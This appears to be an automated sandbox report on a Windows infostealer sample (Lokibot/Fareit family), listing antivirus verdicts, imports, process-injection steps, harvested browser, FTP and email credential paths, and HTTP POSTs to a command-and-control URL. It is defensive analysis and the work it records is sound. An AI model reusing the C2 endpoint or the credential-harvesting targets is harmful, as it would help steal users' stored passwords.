13.2
0-day
57 个模型检测该样本为恶意!
重新分析
更多

ce300fe22dd40237e443695aa13c19735e359100883aef58ac05cb7f127cf604

ff5e107aa8911c2b504e74d1ab236109.exe

分析耗时

85s

最近分析

文件大小

581.0KB
静态报毒 动态报毒 100% AGEN AI SCORE=86 ANDROM AUTO AVAA BTFP76 CLASSIC CONFIDENCE DELF DELPHILESS ECIY ELSZ ELXR FAREIT HAWKEYE HIGH CONFIDENCE HJXWRZ IGENT KG0@AMHX2HDI LOKIBOT MALWARE@#6DD6LF2XFDWC NANOBOT NANOCORE NOANCOOE PUTTY R + MAL R066C0DIK20 SCORE SIMDA SUSGEN TSCOPE UNSAFE X2059 ZELPHIF ZUSY 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Fareit-FSK!FF5E107AA891 20201229 6.0.6.653
Baidu 20190318 1.0.0.2
Avast Win32:Trojan-gen 20201229 21.1.5827.0
Alibaba Backdoor:Win32/Lokibot.f6bed5c3 20190527 0.3.0.5
Tencent Win32.Trojan.Inject.Auto 20201229 1.0.0.1
Kingsoft 20201229 2017.9.26.565
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (3 个事件)
Time & API Arguments Status Return Repeated
1620821529.131249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620821530.365249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620821535.474249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1620821526.693249
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1620821523.693374
__exception__
stacktrace: 
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 34537280
registers.edi: 0
registers.eax: 0
registers.ebp: 34537352
registers.edx: 52
registers.ebx: 0
registers.esi: 0
registers.ecx: 677
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 5e e9 54 7e fa
exception.symbol: ff5e107aa8911c2b504e74d1ab236109+0x5b7e7
exception.instruction: div eax
exception.module: ff5e107aa8911c2b504e74d1ab236109.exe
exception.exception_code: 0xc0000094
exception.offset: 374759
exception.address: 0x45b7e7
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://rnarport.com/drunk/five/fre.php
Performs some HTTP requests (1 个事件)
request POST http://rnarport.com/drunk/five/fre.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://rnarport.com/drunk/five/fre.php
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1620821523.474374
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00570000
success 0 0
1620821523.693374
NtAllocateVirtualMemory
process_identifier: 784
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e30000
success 0 0
1620821523.709374
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01e90000
success 0 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1620821535.443249
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\ff5e107aa8911c2b504e74d1ab236109.exe
newfilepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
newfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
flags: 1
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\ff5e107aa8911c2b504e74d1ab236109.exe
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (3 个事件)
entropy 7.745968202962627 section {'size_of_data': '0x00009c00', 'virtual_address': '0x0005c000', 'entropy': 7.745968202962627, 'name': 'DATA', 'virtual_size': '0x00009b58'} description A section with a high entropy has been found
entropy 7.432820118810428 section {'size_of_data': '0x00023800', 'virtual_address': '0x00073000', 'entropy': 7.432820118810428, 'name': '.rsrc', 'virtual_size': '0x00023628'} description A section with a high entropy has been found
entropy 0.3120689655172414 description Overall entropy of this PE file is high
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1620821530.209249
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 784 called NtSetContextThread to modify thread in remote process 2404
Time & API Arguments Status Return Repeated
1620821524.381374
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2404
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 784 resumed a thread in remote process 2404
Time & API Arguments Status Return Repeated
1620821525.084374
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2404
success 0 0
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1620821524.302374
CreateProcessInternalW
thread_identifier: 3004
thread_handle: 0x00000100
process_identifier: 2404
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\ff5e107aa8911c2b504e74d1ab236109.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000104
inherit_handles: 0
success 1 0
1620821524.302374
NtUnmapViewOfSection
process_identifier: 2404
region_size: 4096
process_handle: 0x00000104
base_address: 0x00400000
success 0 0
1620821524.334374
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2404
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000104
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1620821524.381374
NtGetContextThread
thread_handle: 0x00000100
success 0 0
1620821524.381374
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2404
success 0 0
1620821525.084374
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2404
success 0 0
1620821527.256249
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 2404
success 0 0
File has been identified by 57 AntiVirus engines on VirusTotal as malicious (50 out of 57 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.302497
FireEye Generic.mg.ff5e107aa8911c2b
McAfee Fareit-FSK!FF5E107AA891
Cylance Unsafe
VIPRE Trojan.Win32.Simda.ba (v)
K7AntiVirus Trojan ( 00565f751 )
BitDefender Gen:Variant.Zusy.302497
K7GW Trojan ( 00565f751 )
Cybereason malicious.aa8911
Arcabit Trojan.Zusy.D49DA1
Cyren W32/Trojan.ECIY-8186
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Win32:Trojan-gen
ClamAV Win.Dropper.HawkEye-7759832-0
Kaspersky HEUR:Backdoor.Win32.NanoBot.gen
Alibaba Backdoor:Win32/Lokibot.f6bed5c3
NANO-Antivirus Trojan.Win32.Nanocore.hjxwrz
Tencent Win32.Trojan.Inject.Auto
Ad-Aware Gen:Variant.Zusy.302497
Emsisoft Gen:Variant.Zusy.302497 (B)
Comodo Malware@#6dd6lf2xfdwc
F-Secure Heuristic.HEUR/AGEN.1133569
DrWeb Trojan.Nanocore.23
TrendMicro TROJ_GEN.R066C0DIK20
McAfee-GW-Edition BehavesLike.Win32.Fareit.hc
Sophos Mal/Generic-R + Mal/Fareit-AA
Ikarus Trojan.Inject
Jiangmin Backdoor.Androm.avaa
MaxSecure Trojan.Malware.73699060.susgen
Avira HEUR/AGEN.1133569
Antiy-AVL Trojan[Backdoor]/MSIL.Noancooe
Gridinsoft Trojan.Win32.Packed.dd!n
Microsoft Trojan:Win32/Lokibot.AO!MTB
ZoneAlarm HEUR:Backdoor.Win32.NanoBot.gen
GData Gen:Variant.Zusy.302497
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
Acronis suspicious
BitDefenderTheta Gen:NN.ZelphiF.34700.KG0@amhx2Hdi
MAX malware (ai score=86)
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack
Panda Trj/Agent.AJS
Zoner Trojan.Win32.90773
ESET-NOD32 a variant of Win32/Injector.ELSZ
TrendMicro-HouseCall TROJ_GEN.R066C0DIK20
Rising Trojan.Injector!1.CB27 (CLASSIC)
Yandex Trojan.Igent.bTFP76.18
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)
dead_host 172.217.24.14:443
dead_host 172.217.160.110:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x46713c VirtualFree
0x467140 VirtualAlloc
0x467144 LocalFree
0x467148 LocalAlloc
0x46714c GetVersion
0x467150 GetCurrentThreadId
0x46715c VirtualQuery
0x467160 WideCharToMultiByte
0x467168 MultiByteToWideChar
0x46716c lstrlenA
0x467170 lstrcpynA
0x467174 LoadLibraryExA
0x467178 GetThreadLocale
0x46717c GetStartupInfoA
0x467180 GetProcAddress
0x467184 GetModuleHandleA
0x467188 GetModuleFileNameA
0x46718c GetLocaleInfoA
0x467190 GetLastError
0x467198 GetCommandLineA
0x46719c FreeLibrary
0x4671a0 FindFirstFileA
0x4671a4 FindClose
0x4671a8 ExitProcess
0x4671ac WriteFile
0x4671b4 RtlUnwind
0x4671b8 RaiseException
0x4671bc GetStdHandle
Library user32.dll:
0x4671c4 GetKeyboardType
0x4671c8 LoadStringA
0x4671cc MessageBoxA
0x4671d0 CharNextA
Library advapi32.dll:
0x4671d8 RegQueryValueExA
0x4671dc RegOpenKeyExA
0x4671e0 RegCloseKey
Library oleaut32.dll:
0x4671e8 SysFreeString
0x4671ec SysReAllocStringLen
0x4671f0 SysAllocStringLen
Library kernel32.dll:
0x4671f8 TlsSetValue
0x4671fc TlsGetValue
0x467200 LocalAlloc
0x467204 GetModuleHandleA
Library advapi32.dll:
0x46720c RegQueryValueExA
0x467210 RegOpenKeyExA
0x467214 RegCloseKey
Library kernel32.dll:
0x46721c lstrcpyA
0x467220 lstrcmpA
0x467224 WriteFile
0x467228 WaitForSingleObject
0x46722c VirtualQuery
0x467230 VirtualAlloc
0x467234 Sleep
0x467238 SizeofResource
0x46723c SetThreadLocale
0x467240 SetFilePointer
0x467244 SetEvent
0x467248 SetErrorMode
0x46724c SetEndOfFile
0x467250 ResetEvent
0x467254 ReadFile
0x467258 MulDiv
0x46725c LockResource
0x467260 LoadResource
0x467264 LoadLibraryA
0x467270 GlobalUnlock
0x467274 GlobalReAlloc
0x467278 GlobalHandle
0x46727c GlobalLock
0x467280 GlobalFree
0x467284 GlobalFindAtomA
0x467288 GlobalDeleteAtom
0x46728c GlobalAlloc
0x467290 GlobalAddAtomA
0x467294 GetVersionExA
0x467298 GetVersion
0x46729c GetTickCount
0x4672a0 GetThreadLocale
0x4672a8 GetSystemTime
0x4672ac GetSystemInfo
0x4672b0 GetStringTypeExA
0x4672b4 GetStdHandle
0x4672b8 GetProcAddress
0x4672bc GetModuleHandleA
0x4672c0 GetModuleFileNameA
0x4672c4 GetLocaleInfoA
0x4672c8 GetLocalTime
0x4672cc GetLastError
0x4672d0 GetFullPathNameA
0x4672d4 GetFileAttributesA
0x4672d8 GetDiskFreeSpaceA
0x4672dc GetDateFormatA
0x4672e0 GetCurrentThreadId
0x4672e4 GetCurrentProcessId
0x4672e8 GetCPInfo
0x4672ec GetACP
0x4672f0 FreeResource
0x4672f4 InterlockedExchange
0x4672f8 FreeLibrary
0x4672fc FormatMessageA
0x467300 FindResourceA
0x467304 FindNextFileA
0x467308 FindFirstFileA
0x46730c FindClose
0x46731c ExitThread
0x467320 ExitProcess
0x467324 EnumCalendarInfoA
0x467330 CreateThread
0x467334 CreateFileA
0x467338 CreateEventA
0x46733c CompareStringA
0x467340 CloseHandle
Library version.dll:
0x467348 VerQueryValueA
0x467350 GetFileVersionInfoA
Library gdi32.dll:
0x467358 UnrealizeObject
0x46735c StretchBlt
0x467360 SetWindowOrgEx
0x467364 SetViewportOrgEx
0x467368 SetTextColor
0x46736c SetStretchBltMode
0x467370 SetROP2
0x467374 SetPixel
0x467378 SetDIBColorTable
0x46737c SetBrushOrgEx
0x467380 SetBkMode
0x467384 SetBkColor
0x467388 SelectPalette
0x46738c SelectObject
0x467390 SaveDC
0x467394 RestoreDC
0x467398 RectVisible
0x46739c RealizePalette
0x4673a0 PatBlt
0x4673a4 MoveToEx
0x4673a8 MaskBlt
0x4673ac LineTo
0x4673b0 IntersectClipRect
0x4673b4 GetWindowOrgEx
0x4673b8 GetTextMetricsA
0x4673c4 GetStockObject
0x4673c8 GetPixel
0x4673cc GetPaletteEntries
0x4673d0 GetObjectA
0x4673d4 GetDeviceCaps
0x4673d8 GetDIBits
0x4673dc GetDIBColorTable
0x4673e0 GetDCOrgEx
0x4673e8 GetClipBox
0x4673ec GetBrushOrgEx
0x4673f0 GetBitmapBits
0x4673f4 GetArcDirection
0x4673f8 ExtTextOutA
0x4673fc ExcludeClipRect
0x467400 DeleteObject
0x467404 DeleteDC
0x467408 CreateSolidBrush
0x46740c CreatePenIndirect
0x467410 CreatePalette
0x467418 CreateFontIndirectA
0x46741c CreateDIBitmap
0x467420 CreateDIBSection
0x467424 CreateCompatibleDC
0x46742c CreateBrushIndirect
0x467430 CreateBitmap
0x467434 BitBlt
Library user32.dll:
0x46743c CreateWindowExA
0x467440 WindowFromPoint
0x467444 WinHelpA
0x467448 WaitMessage
0x46744c UpdateWindow
0x467450 UnregisterClassA
0x467454 UnhookWindowsHookEx
0x467458 TranslateMessage
0x467460 TrackPopupMenu
0x467468 ShowWindow
0x46746c ShowScrollBar
0x467470 ShowOwnedPopups
0x467474 ShowCursor
0x467478 SetWindowsHookExA
0x46747c SetWindowTextA
0x467480 SetWindowPos
0x467484 SetWindowPlacement
0x467488 SetWindowLongA
0x46748c SetTimer
0x467490 SetScrollRange
0x467494 SetScrollPos
0x467498 SetScrollInfo
0x46749c SetRect
0x4674a0 SetPropA
0x4674a4 SetParent
0x4674a8 SetMenuItemInfoA
0x4674ac SetMenu
0x4674b0 SetForegroundWindow
0x4674b4 SetFocus
0x4674b8 SetCursor
0x4674bc SetClassLongA
0x4674c0 SetCapture
0x4674c4 SetActiveWindow
0x4674c8 SendMessageA
0x4674cc ScrollWindow
0x4674d0 ScreenToClient
0x4674d4 RemovePropA
0x4674d8 RemoveMenu
0x4674dc ReleaseDC
0x4674e0 ReleaseCapture
0x4674ec RegisterClassA
0x4674f0 RedrawWindow
0x4674f4 PtInRect
0x4674f8 PostQuitMessage
0x4674fc PostMessageA
0x467500 PeekMessageA
0x467504 OffsetRect
0x467508 OemToCharA
0x46750c MessageBoxA
0x467510 MapWindowPoints
0x467514 MapVirtualKeyA
0x467518 LoadStringA
0x46751c LoadKeyboardLayoutA
0x467520 LoadIconA
0x467524 LoadCursorA
0x467528 LoadBitmapA
0x46752c KillTimer
0x467530 IsZoomed
0x467534 IsWindowVisible
0x467538 IsWindowEnabled
0x46753c IsWindow
0x467540 IsRectEmpty
0x467544 IsIconic
0x467548 IsDialogMessageA
0x46754c IsChild
0x467550 InvalidateRect
0x467554 IntersectRect
0x467558 InsertMenuItemA
0x46755c InsertMenuA
0x467560 InflateRect
0x467568 GetWindowTextA
0x46756c GetWindowRect
0x467570 GetWindowPlacement
0x467574 GetWindowLongA
0x467578 GetWindowDC
0x46757c GetTopWindow
0x467580 GetSystemMetrics
0x467584 GetSystemMenu
0x467588 GetSysColorBrush
0x46758c GetSysColor
0x467590 GetSubMenu
0x467594 GetScrollRange
0x467598 GetScrollPos
0x46759c GetScrollInfo
0x4675a0 GetPropA
0x4675a4 GetParent
0x4675a8 GetWindow
0x4675ac GetMenuStringA
0x4675b0 GetMenuState
0x4675b4 GetMenuItemInfoA
0x4675b8 GetMenuItemID
0x4675bc GetMenuItemCount
0x4675c0 GetMenu
0x4675c4 GetLastActivePopup
0x4675c8 GetKeyboardState
0x4675d0 GetKeyboardLayout
0x4675d4 GetKeyState
0x4675d8 GetKeyNameTextA
0x4675dc GetIconInfo
0x4675e0 GetForegroundWindow
0x4675e4 GetFocus
0x4675e8 GetDesktopWindow
0x4675ec GetDCEx
0x4675f0 GetDC
0x4675f4 GetCursorPos
0x4675f8 GetCursor
0x4675fc GetClientRect
0x467600 GetClassNameA
0x467604 GetClassInfoA
0x467608 GetCapture
0x46760c GetActiveWindow
0x467610 FrameRect
0x467614 FindWindowA
0x467618 FillRect
0x46761c EqualRect
0x467620 EnumWindows
0x467624 EnumThreadWindows
0x467628 EndPaint
0x46762c EnableWindow
0x467630 EnableScrollBar
0x467634 EnableMenuItem
0x467638 DrawTextA
0x46763c DrawMenuBar
0x467640 DrawIconEx
0x467644 DrawIcon
0x467648 DrawFrameControl
0x46764c DrawFocusRect
0x467650 DrawEdge
0x467654 DispatchMessageA
0x467658 DestroyWindow
0x46765c DestroyMenu
0x467660 DestroyIcon
0x467664 DestroyCursor
0x467668 DeleteMenu
0x46766c DefWindowProcA
0x467670 DefMDIChildProcA
0x467674 DefFrameProcA
0x467678 CreatePopupMenu
0x46767c CreateMenu
0x467680 CreateIcon
0x467684 ClientToScreen
0x467688 CheckMenuItem
0x46768c CallWindowProcA
0x467690 CallNextHookEx
0x467694 BeginPaint
0x467698 CharNextA
0x46769c CharLowerBuffA
0x4676a0 CharLowerA
0x4676a4 CharToOemA
0x4676a8 AdjustWindowRectEx
Library kernel32.dll:
0x4676b4 Sleep
Library oleaut32.dll:
0x4676bc SafeArrayPtrOfIndex
0x4676c0 SafeArrayGetUBound
0x4676c4 SafeArrayGetLBound
0x4676c8 SafeArrayCreate
0x4676cc VariantChangeType
0x4676d0 VariantCopy
0x4676d4 VariantClear
0x4676d8 VariantInit
Library ole32.dll:
0x4676e0 CoTaskMemAlloc
0x4676e4 CoCreateInstance
0x4676e8 CoUninitialize
0x4676ec CoInitialize
Library comctl32.dll:
0x4676fc ImageList_Write
0x467700 ImageList_Read
0x467710 ImageList_DragMove
0x467714 ImageList_DragLeave
0x467718 ImageList_DragEnter
0x46771c ImageList_EndDrag
0x467720 ImageList_BeginDrag
0x467724 ImageList_Remove
0x467728 ImageList_DrawEx
0x46772c ImageList_Draw
0x46773c ImageList_Add
0x467744 ImageList_Destroy
0x467748 ImageList_Create
0x46774c InitCommonControls

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49176 204.11.56.48 rnarport.com 80
192.168.56.101 49178 204.11.56.48 rnarport.com 80
192.168.56.101 49179 204.11.56.48 rnarport.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 53210 114.114.114.114 53
192.168.56.101 57756 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 63497 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 60215 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://rnarport.com/drunk/five/fre.php 
POST /drunk/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: rnarport.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C7548A
Content-Length: 169
Connection: close
http://rnarport.com/drunk/five/fre.php 
POST /drunk/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: rnarport.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 4C7548A
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.